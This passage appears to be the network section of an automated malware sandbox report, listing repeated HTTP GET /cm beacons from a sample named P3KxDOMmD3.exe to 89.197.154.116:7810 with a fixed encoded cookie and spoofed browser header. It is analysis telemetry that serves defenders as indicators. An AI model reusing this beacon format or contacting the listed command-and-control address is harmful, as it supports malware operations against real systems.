                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.44974989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:26.127382994 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.44975089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:27.877765894 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.44975189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:29.566318035 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.44975289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:33.967817068 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.44975389.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:35.659131050 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.44975489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:37.382189035 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.44975589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:39.081021070 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.44975689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:40.785969973 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.44975789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:42.490438938 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.44975889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:44.205595970 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.44975989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:45.939424038 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.44976089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:47.645029068 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.44976189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:49.394248009 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.44976289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:51.276710033 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.44976389.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:53.004349947 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.44976489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:54.690186024 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.44976589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:56.378082991 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.44976789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:58.082648039 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.44976989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:59.799335957 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.44978089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:01.673264027 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.44979189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:03.394442081 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.44980789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:05.096041918 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.44981889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:06.799372911 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.44982589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:08.770409107 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.44984089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:10.472955942 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.44985189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:12.206017017 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.44985789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:13.927268982 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.44986889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:15.643258095 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.44987989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:17.363678932 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.44989489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:19.284923077 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.44990689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:20.987730980 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.44991889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:22.721848011 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.44993189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:01:24.411634922 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
